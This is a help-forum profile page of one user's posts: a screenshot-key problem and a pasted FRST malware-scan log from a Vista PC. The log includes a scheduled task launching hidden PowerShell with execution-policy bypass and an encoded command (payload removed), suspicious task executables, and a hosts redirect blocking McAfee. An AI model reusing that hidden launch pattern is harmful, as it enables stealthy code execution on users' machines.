InterneTurtle

Everything posted by InterneTurtle

  1. I can't take a screenshot at all. Before, I could press the PrtScn key and it would automatically save a screenshot into a folder. Now nothing at all happens. Even the old way of pressing the key and then pasting the screenshot into MS Paint doesn't work. I also tried the Snipping Tool, which doesn't work either; the entire screen just turns grey when you try to take a snip. The function key is not on, that's not the problem. I don't notice any problems with any other keys. I don't think anything is wrong with the key physically, since tapping it still makes the keyboard light up. I have tried detaching the keyboard and reattaching it. I have no reason to suspect it's a malware infection; I'm guessing Windows 10 changed something when it installed updates recently. Any and all help will be appreciated. Thank you.
  2. Ran the tool; the error didn't appear on startup after the required restart. Fixlog.txt
  3. Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016 Ran by Barbara (administrator) on BARBARA-PC (30-01-2016 12:34:53) Running from C:\Users\Barbara\Desktop Loaded Profiles: Barbara (Available Profiles: Barbara) Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States) Internet Explorer Version 9 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
2016-01-26 03:07 - 2006-11-02 08:33 - 00000000 ____D C:\Windows 2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf 2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI 2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer 2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job 2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job 2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A 2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2016-01-20 11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache 2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM 2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help 2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT 2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT 2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan 2016-01-01 18:32 - 2015-01-31 
14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree ==================== Files in the root of some directories ======= 2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat 2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat 2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt 2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt Some files in TEMP: ==================== C:\Users\Barbara\AppData\Local\Temp\exec.exe C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll C:\Users\Barbara\AppData\Local\Temp\sqlite3.dll C:\Users\Barbara\AppData\Local\Temp\uires.dll ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-01-30 12:28 ==================== End of FRST.txt 
============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016 Ran by Barbara (2016-01-30 12:36:06) Running from C:\Users\Barbara\Desktop Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled) Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A} AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D} AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7} AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.) 
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated) Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation) ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.) Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation) ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby) DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.) DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation) DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version: - ) Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.) Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) 
Hidden Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation) Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation) Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation) Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version: - Lexmark International, Inc.) Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version: - ) LightScribe 1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.) McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.) 
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation) Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) 
(Version: 9.7.0621 - Microsoft Corporation) Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla) MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation) QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.) Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.) 
RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH) Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation) Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated) TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation) Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba) TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA) TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation) TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation) TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation) TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation) TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version: - ) TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation) TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation) TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation) TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation) 
TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version: - ) Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba) TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation) Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.) Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation) TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA) TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: - Agere Systems) TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: - ) TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version: - ) TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version: - ) TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation) TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation) TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation) TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.) 
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent)
Windows Driver Package - TOSHIBA (FwLnk) System (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION
Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION
Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.)
Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION
Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] ()
Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION
Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [encoded command removed]
Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION
Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION
Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe
Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION
Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION
Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ============== 2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll 2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL 2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll 2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll 2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll 2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll 2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll 2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll 2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll 2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll 2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll 2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx 2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for 
TOSHIBA\Kernel\CLML\CLMediaLibrary.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts 0.0.0.1 mssplus.mcafee.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg DNS Servers: 192.168.1.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1) Windows Firewall is enabled. 
